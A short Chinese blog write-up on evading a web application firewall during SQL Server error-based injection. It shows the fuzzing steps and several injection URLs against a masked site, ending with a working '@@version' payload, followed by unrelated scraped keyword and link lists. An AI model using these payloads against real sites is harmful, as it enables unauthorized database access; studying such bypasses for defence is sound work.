一个非常简单的WAF绕过。。
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,0x00 前言确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...0x01 起因工具扫到了一个有sqlserver特性的站点通常出现这种错误信息,说明该站点配置不当,错误信
千家信息网最后更新 2025年12月01日一个非常简单的WAF绕过。。
0x00 前言
确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...
0x01 起因
工具扫到了一个有sqlserver特性的站点
通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下
却出现了WAF的信息
0x02 fuzz
遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试
http://xxxx/xxxx.aspx?xxxx=1' and --a
语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了
select xxx from xxx where xxxx=1' and --a但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试
http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a
竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了
http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a
那么再次尝试下原来的代码,将顺序调整,成功!
http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a
信息
关键
关键字
错误
尝试
不当
成功
代码
再次
前言
工具
思路
数字
新手
特性
站点
类型
老鸟
语句
语法
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
幻塔服务器有什么不同
陈晓桦谈网络安全
死亡细胞联机服务器
数据库学生表编程题及答案
反诈骗网络安全图片
宏基网络安全事件
烽火星空网络安全业务
软件开发如何找客户
怎样搭建本地服务器
安庆深信服网络安全
上海应用软件开发哪家公司好
passport数据库
海南网络营销软件开发定制报价表
手机访问家里的服务器
瑞庭网络技术公司招聘
金融数据终端软件开发
三级网络技术手机题库验证码
《网络安全法》全文解读
软件开发架构图具体分层
轻量级软件开发方法
小程序云数据库复制
上海停车系统软件开发多少钱
进口戴尔服务器诚信企业
如何做电脑app软件开发
网易大神我的世界怎么选择服务器
网络安全全国排名高校
c 中更新数据库中的数据
郑州互联网软件开发机构
忻州一中网络安全
2017网络安全教学视频